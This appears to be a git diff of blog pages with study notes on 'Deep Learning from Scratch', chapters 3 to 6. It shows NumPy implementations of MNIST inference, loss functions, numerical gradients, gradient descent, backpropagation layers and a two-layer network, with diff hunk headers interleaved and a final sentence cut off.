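x = x.astype(np.float32) / 255.0  # scale pixel values from [0, 255] into [0.0, 1.0]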

import pickle

def init_network():
    """
    Load the learned weight parameters stored in the pickle file
    sample_weight.pkl. The file stores the weights and biases as a
    dictionary.
    """
    with open("sample_weight.pkl", 'rb') as f:
        network = pickle.load(f)
    return network

def predict(network, x):
    """
    Forward propagation.
    """
    W1, W2, W3 = network['W1'], network['W2'], network['W3']
    b1, b2, b3 = network['b1'], network['b2'], network['b3']
    a1 = np.dot(x, W1) + b1
    z1 = sigmoid(a1)
    a2 = np.dot(z1, W2) + b2
    z2 = sigmoid(a2)
    a3 = np.dot(z2, W3) + b3
    y = softmax(a3)

    return y

x, t = get_data()
network = init_network()

accuracy_cnt = 0
for i in range(len(x)):
    # Take the images stored in x one by one with the for loop and classify
    # each with predict(). predict() returns the probability of each label
    # as a NumPy array.
    y = predict(network, x[i])
    p = np.argmax(y)  # index of the element with the highest probability
    if p == t[i]:
        accuracy_cnt += 1

print("Accuracy: " + str(float(accuracy_cnt) / len(x)))
        Accuracy:0.9352
         

3.6.3 Batch processing

Print the shapes of the weights in each layer of the network we just used.

x, _ = get_data()
network = init_network()
W1, W2, W3 = network['W1'], network['W2'], network['W3']

x.shape
(10000, 784)

x[0].shape
(784,)

W1.shape
(784, 50)

W2.shape
(50, 100)

W3.shape
(100, 10)
         

Looking at the overall flow (Figure 3-26): a one-dimensional array of 784 elements (originally a 28 × 28 two-dimensional array) goes in, and a one-dimensional array of 10 elements comes out. This is the processing flow when only a single image is fed in.

        @@ -672,7 +670,7 @@

3. 100 images are packed together as the input data.


Input data packed together like this is called a batch. "Batch" carries the sense of a bundle: the images are tied together like a stack of banknotes.
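The point of batching is speed: numerical libraries are heavily optimized for computing large arrays at once, and processing a bundle of images together reduces the per-image overhead of data transfer and function calls.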

x, t = get_data()
network = init_network()

batch_size = 100  # batch size
accuracy_cnt = 0

for i in range(0, len(x), batch_size):
    # Based on the sequence produced by range(), x[i:i+batch_size] slices a
    # batch out of the input data: the elements from index i up to
    # i+batch_size.
    x_batch = x[i:i+batch_size]
    y_batch = predict(network, x_batch)
    # axis=1 specifies that, in the 100 x 10 array, the index of the maximum
    # element is taken along the first axis (axis 0 indexes the samples).
    p = np.argmax(y_batch, axis=1)
    accuracy_cnt += np.sum(p == t[i:i+batch_size])

print("Accuracy:" + str(float(accuracy_cnt) / len(x)))
        Accuracy:0.9352
         

3.7 Summary

        @@ -4628,6 +4626,8 @@

diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-4-\347\245\236\347\273\217\347\275\221\347\273\234\347\232\204\345\255\246\344\271\240/index.html"
index 887f982c0a..bd429a71bb 100644
@@ -422,22 +420,22 @@

4.2.1 Mean squared error

$$E=\frac{1}{2}\sum_k(y_k-t_k)^2$$

$y_k$ is the network's output, $t_k$ the supervised (target) data, and $k$ the dimensionality of the data.

def mean_squared_error(y, t):
    return 0.5 * np.sum((y - t) ** 2)

# let "2" be the correct answer
t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]

# example 1: "2" has the highest probability (0.6)
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
mean_squared_error(np.array(y), np.array(t))
0.09750000000000003

# example 2: "7" has the highest probability (0.6)
y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
mean_squared_error(np.array(y), np.array(t))
0.5975
         

The mean squared error shows that the output of the first example agrees better with the supervised data.

4.2.2 Cross-entropy error

        $$E=-\sum_kt_k\log y_k$$

def cross_entropy_error(y, t):
    """
    The arguments y and t are NumPy arrays. A tiny value delta is added when
    computing np.log, because np.log(0) evaluates to negative infinity
    (-inf), which would break all subsequent computation. Adding a tiny
    value is a protective measure against negative infinity.
    """
    delta = 1e-7
    return -np.sum(t * np.log(y + delta))

t = [0, 0, 1, 0, 0, 0, 0, 0, 0, 0]
y = [0.1, 0.05, 0.6, 0.0, 0.05, 0.1, 0.0, 0.1, 0.0, 0.0]
cross_entropy_error(np.array(y), np.array(t))
0.510825457099338

y = [0.1, 0.05, 0.1, 0.0, 0.05, 0.1, 0.0, 0.6, 0.0, 0.0]
cross_entropy_error(np.array(y), np.array(t))
2.302584092994546
         

4.2.3 Mini-batch learning

        @@ -452,23 +450,23 @@

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# Setting one_hot_label=True yields the one-hot representation
# (only the correct label is 1; all other elements are 0).
(x_train, t_train), (x_test, t_test) = \
    load_mnist(normalize=True, one_hot_label=True)
print(x_train.shape)  # (60000, 784): 60000 training samples, each a 784-dimensional (28 x 28) image
print(t_train.shape)  # (60000, 10): the supervised data are 10-dimensional
        (60000, 784)
         (60000, 10)
         

Randomly sample 10 entries from this training data.

train_size = x_train.shape[0]
batch_size = 10
batch_mask = np.random.choice(train_size, batch_size)
x_batch = x_train[batch_mask]
t_batch = t_train[batch_mask]

np.random.choice() randomly selects the desired number of values from a specified range.

For example, np.random.choice(60000, 10) randomly picks 10 numbers between 0 and 59999:

np.random.choice(60000, 10)
        array([30142, 18947,  8349, 38135,  8519, 25729, 36061, 11248, 12602,
                31498])
         

4.2.4 Implementing mini-batch cross-entropy error

When the supervised data $t$ are one-hot encoded:

def cross_entropy_error(y, t):
    if y.ndim == 1:
        # when y is one-dimensional, i.e. the error of a single sample is
        # being computed, reshape the data
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # for a mini-batch, normalize by the batch size to obtain the average
    # cross-entropy error per sample
    return -np.sum(t * np.log(y + 1e-7)) / batch_size

When the supervised data are in label form (not one-hot, but labels such as "2" or "7"):

def cross_entropy_error(y, t):
    if y.ndim == 1:
        t = t.reshape(1, t.size)
        y = y.reshape(1, y.size)

    batch_size = y.shape[0]
    # y[np.arange(batch_size), t] extracts, for each sample, the network
    # output corresponding to the correct label
    return -np.sum(np.log(y[np.arange(batch_size), t] + 1e-7)) / batch_size
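As a quick illustration of the indexing trick, with made-up numbers:

y = np.array([[0.1, 0.8, 0.1],
              [0.3, 0.2, 0.5]])
t = np.array([1, 2])   # correct labels of the two samples
y[np.arange(2), t]     # -> array([0.8, 0.5])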

4.2.5 Why set up a loss function?

When training a neural network, recognition accuracy cannot be used as the indicator. If accuracy were the indicator, the derivative with respect to the parameters would be 0 almost everywhere: accuracy is discrete, it barely responds to tiny parameter changes, and when it does respond, its value jumps discontinuously.

4.3 Numerical differentiation

        @@ -476,7 +474,7 @@

4.3.1 Derivatives

The defining equation of the derivative:

$$\frac{\mathrm{d}f(x)}{\mathrm{d}x}=\lim_{h\to 0}\frac{f(x+h)-f(x)}{h}$$

A poor implementation:

def numerical_diff(f, x):
    h = 10e-50
    return (f(x+h) - f(x)) / h
• The value of $h$ is too small, which causes rounding error.
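For example, float32 cannot represent such a small h; it rounds to zero, so the difference quotient degenerates:

import numpy as np
np.float32(1e-50)   # -> 0.0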

          @@ -486,43 +484,43 @@

4.3.1 Derivatives (continued): using the central difference

$$\frac{\mathrm{d}f(x)}{\mathrm{d}x}=\lim_{h\to 0}\frac{f(x+h)-f(x-h)}{2h}$$

def numerical_diff(f, x):
    h = 1e-4  # 0.0001
    return (f(x + h) - f(x - h)) / (2 * h)

4.3.2 An example of numerical differentiation

Differentiate $y=0.01x^2+0.1x$:

def function_1(x):
    return 0.01 * x ** 2 + 0.1 * x

import numpy as np
import matplotlib.pylab as plt

x = np.arange(0.0, 20.0, 0.1)  # array x from 0 to 20 in steps of 0.1
y = function_1(x)
plt.xlabel("x")
plt.ylabel("f(x)")
plt.plot(x, y)
plt.show()

(figure: plot of $f(x)=0.01x^2+0.1x$ over $0\le x\le 20$)

numerical_diff(function_1, 5)
0.1999999999990898

numerical_diff(function_1, 10)
0.2999999999986347
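For comparison, the analytical derivative of $f(x)=0.01x^2+0.1x$ is $0.02x+0.1$, which gives exactly $0.2$ at $x=5$ and $0.3$ at $x=10$; the numerical results above agree to many digits.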
         

4.3.3 Partial derivatives

For the function $f(x_0,x_1)=x_0^2+x_1^2$:

def function_2(x):
    return x[0] ** 2 + x[1] ** 2  # or: return np.sum(x ** 2)

When $x_0=3, x_1=4$, the partial derivative with respect to $x_0$, $\frac{\partial f}{\partial x_0}$:

def function_tmp1(x0):
    return x0*x0 + 4.0**2.0

numerical_diff(function_tmp1, 3.0)
        6.00000000000378
         

When $x_0=3, x_1=4$, the partial derivative with respect to $x_1$, $\frac{\partial f}{\partial x_1}$:

def function_tmp2(x1):
    return 3.0 ** 2.0 + x1 * x1

numerical_diff(function_tmp2, 4.0)
        7.999999999999119
         

4.4 Gradients

A vector that gathers the partial derivatives of all variables, such as $\left(\frac{\partial f}{\partial x_0},\frac{\partial f}{\partial x_1}\right)$, is called a gradient.

def numerical_gradient(f, x):
    h = 1e-4  # 0.0001
    grad = np.zeros_like(x)  # create an array with the same shape as x
    for idx in range(x.size):
        tmp_val = x[idx]

        # compute f(x+h)
        x[idx] = tmp_val + h
        fxh1 = f(x)

        # compute f(x-h)
        x[idx] = tmp_val - h
        fxh2 = f(x)

        grad[idx] = (fxh1 - fxh2) / (2 * h)
        x[idx] = tmp_val  # restore the original value

    return grad

Compute the gradients at the points $(3,4)$, $(0,2)$, and $(3,0)$:

numerical_gradient(function_2, np.array([3.0, 4.0]))
array([6., 8.])

numerical_gradient(function_2, np.array([0.0, 2.0]))
array([0., 4.])

numerical_gradient(function_2, np.array([3.0, 0.0]))
array([6., 0.])
         
(figure: the gradients of $f(x_0,x_1)=x_0^2+x_1^2$ plotted as a vector field)

        @@ -542,18 +540,18 @@

        4.

Generally, in neural networks (deep learning), the gradient method refers to gradient descent.

$$x_0=x_0-\eta\frac{\partial f}{\partial x_0} \\ x_1=x_1-\eta\frac{\partial f}{\partial x_1}$$

$\eta$ is the size of the update; in neural-network training it is called the learning rate. The learning rate determines how much is learned in a single step, that is, to what extent the parameters are updated.

def gradient_descent(f, init_x, lr=0.01, step_num=100):
    """
    f: the function to optimize
    init_x: the initial value
    lr: the learning rate
    step_num: the number of iterations of the gradient method
    numerical_gradient(f, x) computes the gradient of the function; the
    update multiplies that gradient by the learning rate, and the whole
    step is repeated step_num times.
    """
    x = init_x

    for i in range(step_num):
        grad = numerical_gradient(f, x)
        x -= lr * grad
    return x

Use the gradient method to find the minimum of $f(x_0,x_1)=x_0^2+x_1^2$:

def function_2(x):
    return x[0] ** 2 + x[1] ** 2

init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=0.1, step_num=100)
        array([-6.11110793e-10,  8.14814391e-10])
         

If the learning rate is too large, the result diverges to a huge value:

# example of a learning rate that is too large: lr=10.0
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=10.0, step_num=100)
        array([-2.58983747e+13, -1.29524862e+12])
         

If the learning rate is too small, training ends with hardly any updates:

# example of a learning rate that is too small: lr=1e-10
init_x = np.array([-3.0, 4.0])
gradient_descent(function_2, init_x=init_x, lr=1e-10, step_num=100)
        array([-2.99999994,  3.99999992])
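A parameter like the learning rate is called a hyperparameter: unlike the weights and biases, which are learned automatically, it has to be set by hand, usually by trying several candidate values.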
         
        @@ -564,24 +562,24 @@

$$\mathbf W = \begin{pmatrix} w_{11} & w_{12} & w_{13}\\ w_{21} & w_{22} & w_{23} \end{pmatrix}$$

$$\frac{\partial L}{\partial \mathbf W} = \begin{pmatrix}\frac{\partial L}{\partial w_{11}} & \frac{\partial L}{\partial w_{12}} & \frac{\partial L}{\partial w_{13}}\\ \frac{\partial L}{\partial w_{21}} & \frac{\partial L}{\partial w_{22}} & \frac{\partial L}{\partial w_{23}}\end{pmatrix}$$

Using a simple neural network as an example, let's implement the gradient computation:

import sys, os
sys.path.append(os.pardir)
import numpy as np
from common.functions import softmax, cross_entropy_error
from common.gradient import numerical_gradient

class simpleNet:
    def __init__(self):
        # initialize with a Gaussian distribution: randn draws samples from
        # the standard normal distribution, here with shape 2x3
        self.W = np.random.randn(2, 3)

    def predict(self, x):
        return np.dot(x, self.W)

    def loss(self, x, t):
        z = self.predict(x)
        y = softmax(z)
        loss = cross_entropy_error(y, t)
        return loss

net = simpleNet()
print(net.W)  # weight parameters
[[ 0.10279342  0.41541928 -0.05036625]
 [-1.08414222  0.75288578  0.93188472]]
         
x = np.array([0.6, 0.9])
p = net.predict(x)
print(p)
[-0.91405194  0.92684877  0.8084765 ]

np.argmax(p)  # index of the maximum value
1

t = np.array([0, 0, 1])  # the correct label
net.loss(x, t)
0.834766753254781
         
def f(W):
    """
    The parameter W of f(W) is a dummy argument: numerical_gradient(f, x)
    executes f(x) internally, so f(W) is defined this way for compatibility.
    """
    return net.loss(x, t)

Or, using a lambda expression:

f = lambda w: net.loss(x, t)

dW = numerical_gradient(f, net.W)
print(dW)
[[ 0.04650845  0.29310612 -0.33961457]
 [ 0.06976267  0.43965918 -0.50942185]]
         
        @@ -620,15 +618,15 @@

Because the data used here are randomly chosen mini-batch data, the method is also called stochastic gradient descent. "Stochastic" means "randomly chosen", so stochastic gradient descent is gradient descent performed on randomly selected data. In many deep-learning frameworks, stochastic gradient descent is implemented by a function named SGD.
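As a minimal sketch of what such an SGD function can look like (assuming params and grads are dictionaries of NumPy arrays, as in the code in this chapter):

class SGD:
    def __init__(self, lr=0.01):
        self.lr = lr

    def update(self, params, grads):
        # one gradient-descent step over all parameters
        for key in params.keys():
            params[key] -= self.lr * grads[key]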

4.5.1 A class for a two-layer neural network

import sys, os
sys.path.append(os.pardir)
from common.functions import *
from common.gradient import numerical_gradient

class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        Initialize the weights.
        params is a dictionary (instance variable) holding the network's parameters.
        input_size: number of neurons in the input layer
        hidden_size: number of neurons in the hidden layer
        output_size: number of neurons in the output layer
        """
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)

    def predict(self, x):
        """
        Run inference; x is the image data.
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)
        return y

    # x: input data, t: supervised data
    def loss(self, x, t):
        """
        Loss function: cross-entropy error.
        """
        y = self.predict(x)

        return cross_entropy_error(y, t)

    def accuracy(self, x, t):
        """
        Compute the recognition accuracy.
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy

    # x: input data, t: supervised data
    def numerical_gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by numerical
        differentiation. grads is a dictionary holding the gradients
        (the return value of numerical_gradient()).
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads

    def gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by backpropagation.
        grads is a dictionary holding the gradients.
        """
        W1, W2 = self.params['W1'], self.params['W2']
        b1, b2 = self.params['b1'], self.params['b2']
        grads = {}

        batch_num = x.shape[0]

        # forward
        a1 = np.dot(x, W1) + b1
        z1 = sigmoid(a1)
        a2 = np.dot(z1, W2) + b2
        y = softmax(a2)

        # backward
        dy = (y - t) / batch_num
        grads['W2'] = np.dot(z1.T, dy)
        grads['b2'] = np.sum(dy, axis=0)

        da1 = np.dot(dy, W2.T)
        dz1 = sigmoid_grad(a1) * da1
        grads['W1'] = np.dot(x.T, dz1)
        grads['b1'] = np.sum(dz1, axis=0)

        return grads

net = TwoLayerNet(input_size=784, hidden_size=100, output_size=10)
print(net.params['W1'].shape) # (784, 100)
print(net.params['b1'].shape) # (100,)
print(net.params['W2'].shape) # (100, 10)
print(net.params['b2'].shape) # (10,)
        (784, 100)
         (100,)
         (100, 10)
         (10,)
         

4.5.2 Implementing mini-batch training

import sys, os
sys.path.append(os.pardir)  # setting to allow importing files from the parent directory
import numpy as np
import matplotlib.pyplot as plt
from dataset.mnist import load_mnist

# load the data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)

network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

iters_num = 10000  # set an appropriate number of iterations
train_size = x_train.shape[0]
batch_size = 100  # mini-batch size
learning_rate = 0.1  # learning rate

train_loss_list = []
train_acc_list = []
test_acc_list = []

# average number of iterations per epoch
iter_per_epoch = max(train_size / batch_size, 1)

for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]

    # compute the gradient
    # grad = network.numerical_gradient(x_batch, t_batch)  # numerical differentiation
    grad = network.gradient(x_batch, t_batch)  # fast version: backpropagation

    # update the parameters
    for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)

    if i % iter_per_epoch == 0:
        # compute the recognition accuracy once per epoch
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print("train acc, test acc | " + str(train_acc) + ", " + str(test_acc))

# plot the results
markers = {'train': 'o', 'test': 's'}
x = np.arange(len(train_acc_list))
plt.plot(x, train_acc_list, label='train acc')
plt.plot(x, test_acc_list, label='test acc', linestyle='--')
plt.xlabel("epochs")
plt.ylabel("accuracy")
plt.ylim(0, 1.0)
plt.legend(loc='lower right')
plt.show()
        train acc, test acc | 0.09863333333333334, 0.0958
         train acc, test acc | 0.7874166666666667, 0.7928
         train acc, test acc | 0.8762, 0.879
        @@ -4602,6 +4600,8 @@ 

diff --git "a/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html" "b/posts/DL-\346\267\261\345\272\246\345\255\246\344\271\240\345\205\245\351\227\250-\345\237\272\344\272\216Python\347\232\204\347\220\206\350\256\272\344\270\216\345\256\236\347\216\260-5-\350\257\257\345\267\256\345\217\215\345\220\221\344\274\240\346\222\255\346\263\225/index.html"
index f5f9956770..7127dec2f3 100644
@@ -454,18 +452,18 @@

5.4.1 Implementing the multiplication layer

All layer implementations share two common methods (interfaces): forward() and backward(). forward() handles forward propagation; backward() handles backpropagation.

Consider $z=xy$; then $\frac{\partial z}{\partial x}=y$ and $\frac{\partial z}{\partial y}=x$.

class MulLayer:
    def __init__(self):
        """
        x and y hold the input signals from forward propagation.
        """
        self.x = None
        self.y = None

    def forward(self, x, y):
        self.x = x
        self.y = y
        out = x * y

        return out

    def backward(self, dout):
        dx = dout * self.y  # swap x and y
        dy = dout * self.x
        return dx, dy

apple = 100
apple_num = 2
tax = 1.1

# layer
mul_apple_layer = MulLayer()
mul_tax_layer = MulLayer()

# forward
apple_price = mul_apple_layer.forward(apple, apple_num)  # total price of the apples
price = mul_tax_layer.forward(apple_price, tax)  # total including tax
print(price)  # 220
        220.00000000000003
         

In addition, the derivatives with respect to each variable can be obtained with backward().

# backward
dprice = 1
dapple_price, dtax = mul_tax_layer.backward(dprice)
dapple, dapple_num = mul_apple_layer.backward(dapple_price)
print(dapple, dapple_num, dtax)  # 2.2 110 200
        2.2 110.00000000000001 200
         

5.4.2 Implementing the addition layer

class AddLayer:
    def __init__(self):
        """
        The addition layer needs no particular initialization,
        so __init__() does nothing.
        """
        pass

    def forward(self, x, y):
        out = x + y
        return out

    def backward(self, dout):
        dx = dout * 1
        dy = dout * 1
        return dx, dy

Using the addition and multiplication layers, implement the purchase of 2 apples and 3 oranges shown in the figure above.

apple = 100
apple_num = 2
orange = 150
orange_num = 3
tax = 1.1

# layer: create the necessary layers
mul_apple_layer = MulLayer()
mul_orange_layer = MulLayer()
add_apple_orange_layer = AddLayer()
mul_tax_layer = MulLayer()

# forward: call the forward() methods in the appropriate order
apple_price = mul_apple_layer.forward(apple, apple_num)  # (1)
orange_price = mul_orange_layer.forward(orange, orange_num)  # (2)
all_price = add_apple_orange_layer.forward(apple_price, orange_price)  # (3)
price = mul_tax_layer.forward(all_price, tax)  # (4)

# backward: call the backward() methods in the reverse order of forward propagation
dprice = 1
dall_price, dtax = mul_tax_layer.backward(dprice)  # (4)
dapple_price, dorange_price = add_apple_orange_layer.backward(dall_price)  # (3)
dorange, dorange_num = mul_orange_layer.backward(dorange_price)  # (2)
dapple, dapple_num = mul_apple_layer.backward(dapple_price)  # (1)

print(price)  # 715
print(dapple_num, dapple, dorange, dorange_num, dtax)  # 110 2.2 3.3 165 650
        715.0000000000001
         110.00000000000001 2.2 3.3000000000000003 165.0 650
         
        @@ -475,7 +473,7 @@

5.5.1 ReLU layer

$$y=\begin{cases}x & (x>0)\\0 & (x\le 0)\end{cases}$$

$$\frac{\partial y}{\partial x}=\begin{cases}1 & (x>0)\\0 & (x\le 0)\end{cases}$$

class Relu:
    def __init__(self):
        self.mask = None

    def forward(self, x):
        """
        mask is a NumPy array of True/False values: the elements of the
        forward-propagation input x that are <= 0 are stored as True,
        the rest (elements > 0) as False.
        """
        self.mask = (x <= 0)
        out = x.copy()
        out[self.mask] = 0

        return out

    def backward(self, dout):
        """
        If an input value was <= 0 during forward propagation, the
        backpropagated value is 0. The backward pass reuses the mask saved
        during the forward pass, setting to 0 the elements of the upstream
        dout where the mask is True.
        """
        dout[self.mask] = 0
        dx = dout

        return dx
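A quick check of the mask behaviour, with a small made-up input:

x = np.array([[1.0, -0.5], [-2.0, 3.0]])
relu = Relu()
relu.forward(x)   # -> [[1., 0.], [0., 3.]]; relu.mask is [[False, True], [True, False]]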

5.5.2 Sigmoid layer

@@ -486,7 +484,7 @@

The derivative of the sigmoid output simplifies to

$$\frac{\partial y}{\partial x}=y(1-y)$$

class Sigmoid:
    def __init__(self):
        self.out = None

    def forward(self, x):
        """
        The forward pass saves its output in the instance variable out.
        """
        out = 1 / (1 + np.exp(-x))
        self.out = out

        return out

    def backward(self, dout):
        """
        The backward pass computes with the saved variable out.
        """
        dx = dout * (1.0 - self.out) * self.out

        return dx

5.6 Implementing the Affine/Softmax layers

5.6.1 Affine layer
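The derivation elided here rests on the standard matrix results that the code below implements. For $\mathbf Y=\mathbf X\mathbf W+\mathbf b$, with the batch dimension summed out of the bias gradient:

$$
\frac{\partial L}{\partial \mathbf X}=\frac{\partial L}{\partial \mathbf Y}\cdot \mathbf W^{\mathrm T},\qquad
\frac{\partial L}{\partial \mathbf W}=\mathbf X^{\mathrm T}\cdot \frac{\partial L}{\partial \mathbf Y},\qquad
\frac{\partial L}{\partial \mathbf b}=\sum_{i}\left(\frac{\partial L}{\partial \mathbf Y}\right)_{i}
$$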

class Affine:
    def __init__(self, W, b):
        self.W = W
        self.b = b
        self.x = None
        self.dW = None
        self.db = None

    def forward(self, x):
        self.x = x
        out = np.dot(x, self.W) + self.b
        return out

    def backward(self, dout):
        dx = np.dot(dout, self.W.T)       # (1)
        self.dW = np.dot(self.x.T, dout)  # (2)
        self.db = np.sum(dout, axis=0)    # (3)
        return dx

5.6.3 Softmax-with-Loss layer
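The backward pass below is strikingly simple because softmax and cross-entropy are designed to cancel: for softmax output $y_k$ and one-hot target $t_k$, the loss $L=-\sum_k t_k\log y_k$ gives

$$\frac{\partial L}{\partial x_k}=y_k-t_k$$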

class SoftmaxWithLoss:
    def __init__(self):
        self.loss = None  # loss value
        self.y = None     # output of softmax
        self.t = None     # supervised labels (one-hot vectors)

    def forward(self, x, t):
        self.t = t
        self.y = softmax(x)
        self.loss = cross_entropy_error(self.y, self.t)
        return self.loss

    def backward(self, dout=1):
        # the gradient of softmax + cross-entropy is simply (y - t),
        # averaged over the batch
        batch_size = self.t.shape[0]
        dx = (self.y - self.t) / batch_size
        return dx

5.7 Implementing backpropagation

5.7.1 The overall picture of neural-network training

Premise: the network has weights and biases, and adjusting them to fit the training data is called "learning". Learning repeats four steps: sample a mini-batch, compute the gradients, update the parameters, and repeat.

5.7.2 Implementing a neural network that supports backpropagation

import sys, os
sys.path.append(os.pardir)
import numpy as np
from common.layers import *
from common.gradient import numerical_gradient
from collections import OrderedDict


class TwoLayerNet:

    def __init__(self, input_size, hidden_size, output_size, weight_init_std=0.01):
        """
        Initialization:
        input_size: number of neurons in the input layer
        hidden_size: number of neurons in the hidden layer
        output_size: number of neurons in the output layer
        weight_init_std: scale of the Gaussian used to initialize the weights
        """
        # initialize the weights
        self.params = {}
        self.params['W1'] = weight_init_std * np.random.randn(input_size, hidden_size)
        self.params['b1'] = np.zeros(hidden_size)
        self.params['W2'] = weight_init_std * np.random.randn(hidden_size, output_size)
        self.params['b2'] = np.zeros(output_size)
        # create the layers
        self.layers = OrderedDict()
        self.layers['Affine1'] = Affine(self.params['W1'], self.params['b1'])
        self.layers['Relu1'] = Relu()
        self.layers['Affine2'] = Affine(self.params['W2'], self.params['b2'])
        self.lastLayer = SoftmaxWithLoss()

    def predict(self, x):
        """
        Run recognition (inference).
        x: image data
        """
        for layer in self.layers.values():
            x = layer.forward(x)
        return x

    def loss(self, x, t):
        """
        Compute the value of the loss function.
        x: input data
        t: supervised labels
        """
        y = self.predict(x)
        return self.lastLayer.forward(y, t)

    def accuracy(self, x, t):
        """
        Compute recognition accuracy.
        """
        y = self.predict(x)
        y = np.argmax(y, axis=1)
        if t.ndim != 1:
            t = np.argmax(t, axis=1)
        accuracy = np.sum(y == t) / float(x.shape[0])
        return accuracy

    def numerical_gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by numerical differentiation.
        """
        loss_W = lambda W: self.loss(x, t)
        grads = {}
        grads['W1'] = numerical_gradient(loss_W, self.params['W1'])
        grads['b1'] = numerical_gradient(loss_W, self.params['b1'])
        grads['W2'] = numerical_gradient(loss_W, self.params['W2'])
        grads['b2'] = numerical_gradient(loss_W, self.params['b2'])
        return grads

    def gradient(self, x, t):
        """
        Compute the gradients of the weight parameters by backpropagation.
        """
        # forward
        self.loss(x, t)
        # backward
        dout = 1
        dout = self.lastLayer.backward(dout)
        layers = list(self.layers.values())
        layers.reverse()
        for layer in layers:
            dout = layer.backward(dout)
        # collect the gradients
        grads = {}
        grads['W1'] = self.layers['Affine1'].dW
        grads['b1'] = self.layers['Affine1'].db
        grads['W2'] = self.layers['Affine2'].dW
        grads['b2'] = self.layers['Affine2'].db
        return grads

5.7.3 Gradient check for backpropagation

Two ways of computing the gradient: numerical differentiation, which is slow but simple and hard to get wrong, and the analytic computation via backpropagation, which is fast but easy to implement incorrectly. Comparing the results of the two to confirm the backpropagation implementation is called gradient check:

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# load the data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)
x_batch = x_train[:3]
t_batch = t_train[:3]
grad_numerical = network.numerical_gradient(x_batch, t_batch)
grad_backprop = network.gradient(x_batch, t_batch)
# mean absolute difference for each weight
for key in grad_numerical.keys():
    diff = np.average(np.abs(grad_backprop[key] - grad_numerical[key]))
    print(key + ":" + str(diff))
W1:5.098230563374566e-10
b1:3.2030157216551143e-09
W2:5.229628806065797e-09

5.7.4 Training with backpropagation

import sys, os
sys.path.append(os.pardir)
import numpy as np
from dataset.mnist import load_mnist

# load the data
(x_train, t_train), (x_test, t_test) = load_mnist(normalize=True, one_hot_label=True)
network = TwoLayerNet(input_size=784, hidden_size=50, output_size=10)

iters_num = 10000
train_size = x_train.shape[0]
batch_size = 100
learning_rate = 0.1
train_loss_list = []
train_acc_list = []
test_acc_list = []

iter_per_epoch = max(train_size / batch_size, 1)

for i in range(iters_num):
    batch_mask = np.random.choice(train_size, batch_size)
    x_batch = x_train[batch_mask]
    t_batch = t_train[batch_mask]
    # compute the gradients by backpropagation
    grad = network.gradient(x_batch, t_batch)
    # update the parameters
    for key in ('W1', 'b1', 'W2', 'b2'):
        network.params[key] -= learning_rate * grad[key]

    loss = network.loss(x_batch, t_batch)
    train_loss_list.append(loss)
    if i % iter_per_epoch == 0:
        train_acc = network.accuracy(x_train, t_train)
        test_acc = network.accuracy(x_test, t_test)
        train_acc_list.append(train_acc)
        test_acc_list.append(test_acc)
        print(train_acc, test_acc)
0.1278 0.1323
0.9025833333333333 0.9064
0.9237166666666666 0.925
Deep Learning from Scratch, Based on Python: Theory and Implementation (6): Techniques Related to Learning

6.1 Updating parameters

          6.1.2 SGD

          $$\mathbf W\leftarrow \mathbf W -\eta\frac{\partial L}{\partial \mathbf W}$$

class SGD:
    def __init__(self, lr=0.01):
        self.lr = lr

    def update(self, params, grads):
        for key in params.keys():
            params[key] -= self.lr * grads[key]
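Pulling the update rule out into an optimizer class decouples it from the network; the training loop of section 5.7.4 then takes the shape below (a sketch; get_mini_batch is a hypothetical helper standing in for the np.random.choice sampling used earlier):

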